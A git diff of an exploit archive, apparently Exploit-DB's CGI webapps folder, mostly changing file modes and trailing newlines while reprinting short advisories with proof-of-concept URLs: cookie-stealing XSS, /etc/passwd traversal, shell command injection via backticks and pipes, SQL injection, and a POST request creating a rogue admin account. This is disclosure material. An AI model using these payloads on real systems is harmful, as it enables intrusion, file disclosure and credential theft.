-http://wwww.example.com:81/cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27XSS%27%29%3B%3C/script%3E \ No newline at end of file +http://wwww.example.com:81/cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27XSS%27%29%3B%3C/script%3E \ No newline at end of file diff --git a/platforms/cgi/webapps/23217.txt b/platforms/cgi/webapps/23217.txt old mode 100755 new mode 100644 index 9b3173ccd..84b40c368 --- a/platforms/cgi/webapps/23217.txt +++ b/platforms/cgi/webapps/23217.txt @@ -6,4 +6,4 @@ Successful exploitation of this vulnerability may allow an attacker to steal coo Divine Content Server version 5.0 may be vulnerable to this issue, however this information cannot be confirmed at the moment. -http://www.example.com/servlet/ContentServer?pagename=<body%20onload=alert(document.cookie);> \ No newline at end of file +http://www.example.com/servlet/ContentServer?pagename=<body%20onload=alert(document.cookie);> \ No newline at end of file diff --git a/platforms/cgi/webapps/23266.txt b/platforms/cgi/webapps/23266.txt old mode 100755 new mode 100644 index 6f1e68ff9..9fc22e60f --- a/platforms/cgi/webapps/23266.txt +++ b/platforms/cgi/webapps/23266.txt @@ -4,4 +4,4 @@ Dansie Shopping Cart is reported to be prone to path disclosre issue in the 'db' Information gained by exploiting this attack may aid an attacker in launching further attacks against a vulnerable system. -http://www.example.com/cgi-bin/cart.pl?db=' \ No newline at end of file +http://www.example.com/cgi-bin/cart.pl?db=' \ No newline at end of file diff --git a/platforms/cgi/webapps/23275.txt b/platforms/cgi/webapps/23275.txt old mode 100755 new mode 100644 index f0e9c34ab..b0a0ed817 --- a/platforms/cgi/webapps/23275.txt +++ b/platforms/cgi/webapps/23275.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8876/info A problem has been reported in the handling of some types of input to DansGuardian. This problem may permit an attacker to launch cross-site scripting attacks. -http://www.example.com/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Test');window.open+("http://www.example.com")</script> \ No newline at end of file +http://www.example.com/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Test');window.open+("http://www.example.com")</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/23332.txt b/platforms/cgi/webapps/23332.txt old mode 100755 new mode 100644 index a7d298b71..77d2e1887 --- a/platforms/cgi/webapps/23332.txt +++ b/platforms/cgi/webapps/23332.txt @@ -4,4 +4,4 @@ MPM Guestbook is reported to be prone to a cross-site scripting vulnerability. T An attacker could exploit this issue by enticing a user to follow a malicious link. This could theoretically allow for theft of cookie-based authentication credentials or other attacks. -http://www.example.com/guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E \ No newline at end of file +http://www.example.com/guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E \ No newline at end of file diff --git a/platforms/cgi/webapps/23367.txt b/platforms/cgi/webapps/23367.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23370.txt b/platforms/cgi/webapps/23370.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23395.txt b/platforms/cgi/webapps/23395.txt old mode 100755 new mode 100644 index 1cf576074..8a6f9ab35 --- a/platforms/cgi/webapps/23395.txt +++ b/platforms/cgi/webapps/23395.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9094/info It has been reported that CommerceSQL may be prone to a directory traversal vulnerability that may allow an attacker to gain access to sensitive information. The issue presents itself due to insufficient sanitization of user-supplied input. An attacker may traverse outside the server root directory by using '../' character sequences. -index.cgi?page=../../../../../../../../etc/passwd \ No newline at end of file +index.cgi?page=../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/cgi/webapps/23409.c b/platforms/cgi/webapps/23409.c old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23410.txt b/platforms/cgi/webapps/23410.txt old mode 100755 new mode 100644 index ad36b8004..0dc7d6a5b --- a/platforms/cgi/webapps/23410.txt +++ b/platforms/cgi/webapps/23410.txt @@ -4,4 +4,4 @@ IBM Directory Server is prone to cross-site scripting attacks via the web admini This issue was reported in Directory Server 4.1. Other versions may also be affected. -https://www.example.com/ldap/cgi-bin/ldacgi.exe?Action=<script>alert("foo")</script> \ No newline at end of file +https://www.example.com/ldap/cgi-bin/ldacgi.exe?Action=<script>alert("foo")</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/23421.txt b/platforms/cgi/webapps/23421.txt old mode 100755 new mode 100644 index 16b9dedd9..2e56102fc --- a/platforms/cgi/webapps/23421.txt +++ b/platforms/cgi/webapps/23421.txt @@ -8,4 +8,4 @@ http://www.example.com/reademail.pl?id=666&folder=qwer'%20or%20EmailDatabase_v.A http://www.example.com/parse.pl?file=html/english/xp/xplogin.html -http://www.example.com/showmail.pl?Folder=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/showmail.pl?Folder=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/23432.txt b/platforms/cgi/webapps/23432.txt old mode 100755 new mode 100644 index 3e897796c..c4b1e77f5 --- a/platforms/cgi/webapps/23432.txt +++ b/platforms/cgi/webapps/23432.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9202/info RemotelyAnywhere has been reported prone to a logout message injection weakness. It has been reported that this issue presents itself due to a lack of sufficient restrictions performed by RemotelyAnywhere on user supplied 'reason' URI parameters. If a target user followed a malicious link, an attacker could potentially abuse this weakness, to include arbitrary messages in logout screens. This may aid in social engineering type attacks against the target user. -https://www.example.com:2000/default.html?logout=asdf&reason=Please%20set%20your%20password%20to%20ABC123%20after%20login \ No newline at end of file +https://www.example.com:2000/default.html?logout=asdf&reason=Please%20set%20your%20password%20to%20ABC123%20after%20login \ No newline at end of file diff --git a/platforms/cgi/webapps/23447.txt b/platforms/cgi/webapps/23447.txt old mode 100755 new mode 100644 index c8dda7e4e..61c7a498c --- a/platforms/cgi/webapps/23447.txt +++ b/platforms/cgi/webapps/23447.txt @@ -4,4 +4,4 @@ It has been reported that the SiteInteractive Subscribe Me setup.pl script lacks http://www.example.com/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extension=pl&config=pl&permissions=777&os=notunixornt&perlpath=/usr/bin/perl&mailprog=/bin/sh&notific ation="%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20%3E%20%69%64` -%20."&websiteurl=evilhacker&br_username=evilhacker&session_id=0&cgipath=. \ No newline at end of file +%20."&websiteurl=evilhacker&br_username=evilhacker&session_id=0&cgipath=. \ No newline at end of file diff --git a/platforms/cgi/webapps/23466.txt b/platforms/cgi/webapps/23466.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23467.txt b/platforms/cgi/webapps/23467.txt old mode 100755 new mode 100644 index 7808530d2..89fd6e33e --- a/platforms/cgi/webapps/23467.txt +++ b/platforms/cgi/webapps/23467.txt @@ -6,4 +6,4 @@ Specific vulnerable versions of the software were not identified in the report; http://www.example.com/quikstore.cgi?category=blah&template=../../../../../../../../../../etc/passwd%00.html http://www.example.com/quikstore.cgi?category=blah&template=../../../../../../../../../../../../etc/hosts -http://www.example.com/quikstore.cgi?category=blah&template=../../../../../../../../../../../../usr/bin/id| \ No newline at end of file +http://www.example.com/quikstore.cgi?category=blah&template=../../../../../../../../../../../../usr/bin/id| \ No newline at end of file diff --git a/platforms/cgi/webapps/23485.txt b/platforms/cgi/webapps/23485.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23488.txt b/platforms/cgi/webapps/23488.txt old mode 100755 new mode 100644 index e26fe7d3b..85f8c0c8f --- a/platforms/cgi/webapps/23488.txt +++ b/platforms/cgi/webapps/23488.txt @@ -6,4 +6,4 @@ Due to a lack of information, further details cannot be outlined at the moment. http://www.example.com/cgi-bin/path_to_file/bsml.pl?action=empty http://www.example.com/cgi-bin/path_to_file/bsml.pl?action=sm -http://www.example.com/cgi-bin/path_to_file/bsml.pl?action=edit \ No newline at end of file +http://www.example.com/cgi-bin/path_to_file/bsml.pl?action=edit \ No newline at end of file diff --git a/platforms/cgi/webapps/23535.txt b/platforms/cgi/webapps/23535.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23548.txt b/platforms/cgi/webapps/23548.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23549.txt b/platforms/cgi/webapps/23549.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23550.txt b/platforms/cgi/webapps/23550.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23551.txt b/platforms/cgi/webapps/23551.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23613.txt b/platforms/cgi/webapps/23613.txt old mode 100755 new mode 100644 index 7d44a2747..c6e69e9d3 --- a/platforms/cgi/webapps/23613.txt +++ b/platforms/cgi/webapps/23613.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9517/info Web Blog is prone to a file disclosure vulnerability. Remote attackers may gain access to files on the system hosting the server that reside outside of the server root by submitting a malicious request that contains directory traversal sequences. This would permit the attacker to access files that are readable by the server and could disclose sensitive information. -http://www.example.com/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=/../../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=/../../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/cgi/webapps/23615.txt b/platforms/cgi/webapps/23615.txt old mode 100755 new mode 100644 index 48115c976..b1f2968fc --- a/platforms/cgi/webapps/23615.txt +++ b/platforms/cgi/webapps/23615.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9524/info It has been reported that PJ CGI Neo Review may be prone to a directory traversal vulnerability that may allow a remote attacker to access information outside the server root directory by using '../' character sequences. -http://www.example.com/directory/PJreview_Neo.cgi?p=/../../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/directory/PJreview_Neo.cgi?p=/../../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/cgi/webapps/23629.txt b/platforms/cgi/webapps/23629.txt old mode 100755 new mode 100644 index f761569a7..927b93257 --- a/platforms/cgi/webapps/23629.txt +++ b/platforms/cgi/webapps/23629.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9539/info Web Blog has been reported to be prone to a vulnerability that may permit remote attackers to execute arbitrary commands in the context of the hosting web server. This is due to insufficient sanitization of shell metacharacters from variables which will be used as an argument to a function that invokes the shell directly. -http://www.example.com/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=|command| \ No newline at end of file +http://www.example.com/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=|command| \ No newline at end of file diff --git a/platforms/cgi/webapps/23647.txt b/platforms/cgi/webapps/23647.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23659.txt b/platforms/cgi/webapps/23659.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23705.txt b/platforms/cgi/webapps/23705.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23706.txt b/platforms/cgi/webapps/23706.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23806.txt b/platforms/cgi/webapps/23806.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23807.txt b/platforms/cgi/webapps/23807.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23809.txt b/platforms/cgi/webapps/23809.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23810.txt b/platforms/cgi/webapps/23810.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23890.txt b/platforms/cgi/webapps/23890.txt old mode 100755 new mode 100644 index db3a93da8..5a2a97297 --- a/platforms/cgi/webapps/23890.txt +++ b/platforms/cgi/webapps/23890.txt @@ -4,4 +4,4 @@ It has been reported that Fresh Guest Book is prone to a remote HTML injection v An attacker may exploit the aforementioned vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user. It may be possible to steal the unsuspecting user's cookie-based authentication credentials, as well as other sensitive information. Other attacks may also be possible. -<script>alert('xss');</script> \ No newline at end of file +<script>alert('xss');</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/23894.txt b/platforms/cgi/webapps/23894.txt old mode 100755 new mode 100644 index 172b8c17e..164afdfbf --- a/platforms/cgi/webapps/23894.txt +++ b/platforms/cgi/webapps/23894.txt @@ -4,4 +4,4 @@ A vulnerability has been reported to exist in Cloisterblog that may allow a remo Successful exploitation of this vulnerability may allow a remote attacker to gain access to sensitive information that may be used to launch further attacks against a vulnerable system. -http://www.example.com/cloisterblog/journal.pl?syear=2004&sday=11&smonth=../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/cloisterblog/journal.pl?syear=2004&sday=11&smonth=../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/cgi/webapps/23897.txt b/platforms/cgi/webapps/23897.txt old mode 100755 new mode 100644 index e8efdda79..dac8ed1b3 --- a/platforms/cgi/webapps/23897.txt +++ b/platforms/cgi/webapps/23897.txt @@ -5,4 +5,4 @@ It has been reported that LINBOX is prone to a remote authentication bypass vuln This issue may allow unauthorized user to gain access to the administration scripts of the affected system. Issuing the following request to the affected server will provide access to the administration interface: -http://www.example.com//admin/user.pl \ No newline at end of file +http://www.example.com//admin/user.pl \ No newline at end of file diff --git a/platforms/cgi/webapps/23913.txt b/platforms/cgi/webapps/23913.txt old mode 100755 new mode 100644 index 5ff85fa17..432347898 --- a/platforms/cgi/webapps/23913.txt +++ b/platforms/cgi/webapps/23913.txt @@ -6,4 +6,4 @@ The cross-site scripting issue could permit a remote attacker to create a malici An attacker may exploit the HTML injection vulnerability to execute arbitrary script code in the browser of an unsuspecting user. It may be possible to steal the unsuspecting user's cookie-based authentication credentials, as well as other sensitive information. Other attacks may also be possible. -http://www.example.com/inbox/index.fts?folder=TEST&index=1 \ No newline at end of file +http://www.example.com/inbox/index.fts?folder=TEST&index=1 \ No newline at end of file diff --git a/platforms/cgi/webapps/23914.txt b/platforms/cgi/webapps/23914.txt old mode 100755 new mode 100644 index 0ea2698ff..4c49ec451 --- a/platforms/cgi/webapps/23914.txt +++ b/platforms/cgi/webapps/23914.txt @@ -5,4 +5,4 @@ It has been reported that FTGate it prone to a server path disclosure vulnerabil These issues may be leveraged to gain sensitive information about the affected system potentially aiding an attacker in mounting further attacks. http://www.example.com/inbox/message.fts -http://www.example.com/inbox/message.fts?folder=Sent%20Items&id=test \ No newline at end of file +http://www.example.com/inbox/message.fts?folder=Sent%20Items&id=test \ No newline at end of file diff --git a/platforms/cgi/webapps/23937.txt b/platforms/cgi/webapps/23937.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23938.txt b/platforms/cgi/webapps/23938.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23939.txt b/platforms/cgi/webapps/23939.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23940.txt b/platforms/cgi/webapps/23940.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23941.txt b/platforms/cgi/webapps/23941.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/23942.txt b/platforms/cgi/webapps/23942.txt old mode 100755 new mode 100644 index 086103078..fb5e1fca3 --- a/platforms/cgi/webapps/23942.txt +++ b/platforms/cgi/webapps/23942.txt @@ -4,4 +4,4 @@ Multiple vulnerabilities have been identified in the application that may allow 1st Class Mail Server version 4.01 is reported to be prone to these issues, however, it is possible that other versions are affected as well. -http://www.example.com/AUTH=[some_value]/user/list.tagz?Site=www.example.com&Mailbox=[html_code] \ No newline at end of file +http://www.example.com/AUTH=[some_value]/user/list.tagz?Site=www.example.com&Mailbox=[html_code] \ No newline at end of file diff --git a/platforms/cgi/webapps/23986.txt b/platforms/cgi/webapps/23986.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24001.txt b/platforms/cgi/webapps/24001.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24094.txt b/platforms/cgi/webapps/24094.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24122.txt b/platforms/cgi/webapps/24122.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24164.txt b/platforms/cgi/webapps/24164.txt old mode 100755 new mode 100644 index 026e2482a..92d722ee5 --- a/platforms/cgi/webapps/24164.txt +++ b/platforms/cgi/webapps/24164.txt @@ -6,4 +6,4 @@ This issue will allow an attacker to download or view scripts residing in the 'c This issue is reported to affect TinyWeb 1.92, it is likely that other versions are also vulnerable. -http://www.example.com/./cgi-bin/targetfile \ No newline at end of file +http://www.example.com/./cgi-bin/targetfile \ No newline at end of file diff --git a/platforms/cgi/webapps/24175.txt b/platforms/cgi/webapps/24175.txt old mode 100755 new mode 100644 index 24bb1d953..cf9af806a --- a/platforms/cgi/webapps/24175.txt +++ b/platforms/cgi/webapps/24175.txt @@ -4,4 +4,4 @@ It is reported that Linksys Web Camera software is prone to a remote file disclo Linksys Web Camera software version 2.10 is reportedly prone to this issue, however, it is possible that other versions are affected as well. -http://www.example.com/main.cgi?next_file=/etc/passwd \ No newline at end of file +http://www.example.com/main.cgi?next_file=/etc/passwd \ No newline at end of file diff --git a/platforms/cgi/webapps/24197.txt b/platforms/cgi/webapps/24197.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24236.txt b/platforms/cgi/webapps/24236.txt old mode 100755 new mode 100644 index 44db3b5af..5abd9be97 --- a/platforms/cgi/webapps/24236.txt +++ b/platforms/cgi/webapps/24236.txt @@ -6,4 +6,4 @@ A remote attacker can exploit this issue by creating a malicious link to the vul Cart32 version 5.0 and prior are considered prone to this issue. -http://www.example.com/scripts/cart32.exe/GetLatestBuilds?cart32=&lt;script&gt;alert('XSS')&lt;/script&gt; \ No newline at end of file +http://www.example.com/scripts/cart32.exe/GetLatestBuilds?cart32=&lt;script&gt;alert('XSS')&lt;/script&gt; \ No newline at end of file diff --git a/platforms/cgi/webapps/24237.txt b/platforms/cgi/webapps/24237.txt old mode 100755 new mode 100644 index b0bc23282..7803ebf2f --- a/platforms/cgi/webapps/24237.txt +++ b/platforms/cgi/webapps/24237.txt @@ -6,4 +6,4 @@ Successful exploitation of this vulnerability may allow an attacker to gain sens All current versions of csFAQ are considered vulnerable to this issue. -http://www.example.com/cgi-script/csFAQ/csFAQ.cgi?command=viewFAQ&database=/.darkbicho \ No newline at end of file +http://www.example.com/cgi-script/csFAQ/csFAQ.cgi?command=viewFAQ&database=/.darkbicho \ No newline at end of file diff --git a/platforms/cgi/webapps/24244.txt b/platforms/cgi/webapps/24244.txt old mode 100755 new mode 100644 index 375f2174b..36c4ead23 --- a/platforms/cgi/webapps/24244.txt +++ b/platforms/cgi/webapps/24244.txt @@ -5,4 +5,4 @@ Netegrity IdentityMinder is a tool designed for the Microsoft Windows platform t It has been reported that Netegrity IdentityMinder is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. A remote attacker can exploit this issue by creating a malicious link to the vulnerable application that includes hostile HTML and script code. If this link were followed by an unsuspecting user, the hostile code may be rendered in the their web browser. This would occur in the security context of the web server and may allow for theft of cookie-based authentication credentials as well as arbitrary application command execution. -http://www.example.com/idm/siteName/ims_mainconsole_principalpopuphandler.do?searchAttrs0=%25GROUP_NAME%25&searchOperators0=EQUALS&searchFilter0=&searchOrgDN=specifiedDNValue&incChildrenOrgFlag=NO&resultsPerPage=10&oid=&imsui_taskstate=RESOLVE_SCOPE&imsui_tpnametosearch=group&numOfExpressions=1%00<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/idm/siteName/ims_mainconsole_principalpopuphandler.do?searchAttrs0=%25GROUP_NAME%25&searchOperators0=EQUALS&searchFilter0=&searchOrgDN=specifiedDNValue&incChildrenOrgFlag=NO&resultsPerPage=10&oid=&imsui_taskstate=RESOLVE_SCOPE&imsui_tpnametosearch=group&numOfExpressions=1%00<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/24245.txt b/platforms/cgi/webapps/24245.txt old mode 100755 new mode 100644 index 9bcc17efb..4b00ec3e2 --- a/platforms/cgi/webapps/24245.txt +++ b/platforms/cgi/webapps/24245.txt @@ -5,4 +5,4 @@ Netegrity IdentityMinder is a tool designed for the Microsoft Windows platform t It has been reported that Netegrity IdentityMinder is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. A remote attacker can exploit this issue by creating a malicious link to the vulnerable application that includes hostile HTML and script code. If this link were followed by an unsuspecting user, the hostile code may be rendered in the their web browser. This would occur in the security context of the web server and may allow for theft of cookie-based authentication credentials as well as arbitrary application command execution. -http://PUT_ADDRESS_HERE:7001/idmmanage/mobjattr.do?diroid=OID&attrname=Group%20Members&mobjtype=2<script>alert(document.cookie)</script> \ No newline at end of file +http://PUT_ADDRESS_HERE:7001/idmmanage/mobjattr.do?diroid=OID&attrname=Group%20Members&mobjtype=2<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/24251.txt b/platforms/cgi/webapps/24251.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24252.txt b/platforms/cgi/webapps/24252.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24254.txt b/platforms/cgi/webapps/24254.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24284.txt b/platforms/cgi/webapps/24284.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24285.txt b/platforms/cgi/webapps/24285.txt old mode 100755 new mode 100644 index 4bb65ad90..2ee8b9747 --- a/platforms/cgi/webapps/24285.txt +++ b/platforms/cgi/webapps/24285.txt @@ -8,4 +8,4 @@ These vulnerabilities could be used by an attacker to aid them in further attack Version 1.1.10.0 is reported vulnerable. Prior versions may also contain these vulnerabilities as well. -http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[whatever] \ No newline at end of file +http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[whatever] \ No newline at end of file diff --git a/platforms/cgi/webapps/24286.txt b/platforms/cgi/webapps/24286.txt old mode 100755 new mode 100644 index 1baab15d4..ca9c70243 --- a/platforms/cgi/webapps/24286.txt +++ b/platforms/cgi/webapps/24286.txt @@ -7,4 +7,4 @@ A remote attacker can exploit this issue by creating a malicious link to the vul Cattaca Server 2003 version 1.1.10.0 is reported prone to this issue. Other versions may also be vulnerable. http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[code]//[code] -http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=[code]//[code]&LANGUAGE=lang//en \ No newline at end of file +http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=[code]//[code]&LANGUAGE=lang//en \ No newline at end of file diff --git a/platforms/cgi/webapps/24287.txt b/platforms/cgi/webapps/24287.txt old mode 100755 new mode 100644 index 1c4ea9689..194f87e99 --- a/platforms/cgi/webapps/24287.txt +++ b/platforms/cgi/webapps/24287.txt @@ -4,4 +4,4 @@ BoardPower Forum is reportedly affected by a cross-site scripting vulnerability A remote attacker can exploit this issue by creating a malicious link to the vulnerable application that includes hostile HTML and script code. If this link were followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the web server and may allow for theft of cookie-based authentication credentials or other attacks. -http://www.example.com/cgi-bin/boardpower/icq.cgi?action=<script>javascript:alert('hello');</script> \ No newline at end of file +http://www.example.com/cgi-bin/boardpower/icq.cgi?action=<script>javascript:alert('hello');</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/24347.txt b/platforms/cgi/webapps/24347.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24400.txt b/platforms/cgi/webapps/24400.txt old mode 100755 new mode 100644 index 7c68876da..bebe95ae3 --- a/platforms/cgi/webapps/24400.txt +++ b/platforms/cgi/webapps/24400.txt @@ -8,4 +8,4 @@ This issue is reported to affect: - Axis 2401 and 2401 video servers -http://www.example.com/axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwd\x60 \ No newline at end of file +http://www.example.com/axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwd\x60 \ No newline at end of file diff --git a/platforms/cgi/webapps/24401.txt b/platforms/cgi/webapps/24401.txt old mode 100755 new mode 100644 index 7e6269f00..cccdd3cdc --- a/platforms/cgi/webapps/24401.txt +++ b/platforms/cgi/webapps/24401.txt @@ -11,4 +11,4 @@ POST /cgi-bin/scripts/../../this_server/ServerManager.srv HTTP/1.0 Content-Length: 250 Pragma: no-cache -conf_Security_List=root%%3AADVO%%3A%%3Awh00t%%3AAD%%3A119104048048116%%3A&users=wh00t&username=wh00t&password1=wh00t&password2=wh00t&checkAdmin=on&checkDial=on&checkView=on&servermanager_return_page=%%2Fadmin%%2Fsec_users.shtml&servermanager_do=set_variables \ No newline at end of file +conf_Security_List=root%%3AADVO%%3A%%3Awh00t%%3AAD%%3A119104048048116%%3A&users=wh00t&username=wh00t&password1=wh00t&password2=wh00t&checkAdmin=on&checkDial=on&checkView=on&servermanager_return_page=%%2Fadmin%%2Fsec_users.shtml&servermanager_do=set_variables \ No newline at end of file diff --git a/platforms/cgi/webapps/24402.php b/platforms/cgi/webapps/24402.php old mode 100755 new mode 100644 index d7851e276..e724953f4 --- a/platforms/cgi/webapps/24402.php +++ b/platforms/cgi/webapps/24402.php @@ -376,4 +376,4 @@ HREF="javascript:saveData()">-=[Go!Go!]=-</A></font></td> </TD></TR></TABLE><INPUT TYPE="HIDDEN" NAME="servermanager_return_page" VALUE="/admin/setgen/security.shtml"> <INPUT TYPE="HIDDEN" NAME="servermanager_do" -VALUE="set_variables"></FORM></TD></TR></TABLE></BODY></HTML> \ No newline at end of file +VALUE="set_variables"></FORM></TD></TR></TABLE></BODY></HTML> \ No newline at end of file diff --git a/platforms/cgi/webapps/24408.txt b/platforms/cgi/webapps/24408.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24574.txt b/platforms/cgi/webapps/24574.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24576.txt b/platforms/cgi/webapps/24576.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24591.txt b/platforms/cgi/webapps/24591.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24611.txt b/platforms/cgi/webapps/24611.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24612.txt b/platforms/cgi/webapps/24612.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24630.txt b/platforms/cgi/webapps/24630.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24700.txt b/platforms/cgi/webapps/24700.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24703.txt b/platforms/cgi/webapps/24703.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24721.txt b/platforms/cgi/webapps/24721.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24722.txt b/platforms/cgi/webapps/24722.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24723.txt b/platforms/cgi/webapps/24723.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24779.txt b/platforms/cgi/webapps/24779.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24836.txt b/platforms/cgi/webapps/24836.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/24986.txt b/platforms/cgi/webapps/24986.txt old mode 100755 new mode 100644 index 2f120ef70..f281faf26 --- a/platforms/cgi/webapps/24986.txt +++ b/platforms/cgi/webapps/24986.txt @@ -5,4 +5,4 @@ Multiple remote SQL injection vulnerabilities reportedly affect Ikonboard. These An attacker may exploit these issues to manipulate SQL queries to the underlying database. This may facilitate theft of sensitive information, potentially including authentication credentials, and data corruption. http://host/support/ikonboard.cgi?act=ST&f=27&t=13066&hl=nickname&st=[SQL_Syntax] -http://host/support/ikonboard.cgi?act=Search&CODE=01&keywords=[SQL_Syntax]&type=name&forums=all&search_in=all&prune=0 \ No newline at end of file +http://host/support/ikonboard.cgi?act=Search&CODE=01&keywords=[SQL_Syntax]&type=name&forums=all&search_in=all&prune=0 \ No newline at end of file diff --git a/platforms/cgi/webapps/25041.txt b/platforms/cgi/webapps/25041.txt old mode 100755 new mode 100644 index 1234612d2..a49554bdc --- a/platforms/cgi/webapps/25041.txt +++ b/platforms/cgi/webapps/25041.txt @@ -4,4 +4,4 @@ It is reported that e_Board is vulnerable to a directory traversal vulnerability By including '../' directory traversal sequences and a NULL (%00) in the affected URI argument, attackers may reportedly cause the contents of arbitrary, potentially sensitive web-server readable files to be included in the output of the requested page. -http://www.example.com/cgi-bin/eboard40/index2.cgi?frames=yes&board=demo&mode=Current&threads=Collapse&message=../../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/cgi-bin/eboard40/index2.cgi?frames=yes&board=demo&mode=Current&threads=Collapse&message=../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/cgi/webapps/25042.txt b/platforms/cgi/webapps/25042.txt old mode 100755 new mode 100644 index b3a44f3c1..655d2b708 --- a/platforms/cgi/webapps/25042.txt +++ b/platforms/cgi/webapps/25042.txt @@ -4,4 +4,4 @@ Tlen.pl is reported prone to a potential script execution vulnerability. It is r Tlen.pl 5.23.4.1 and prior versions are affected by this vulnerability. -www.tlen.pl"style=background-image:url(javascript:alert(%22You%20are%20owned!%22));.pl \ No newline at end of file +www.tlen.pl"style=background-image:url(javascript:alert(%22You%20are%20owned!%22));.pl \ No newline at end of file diff --git 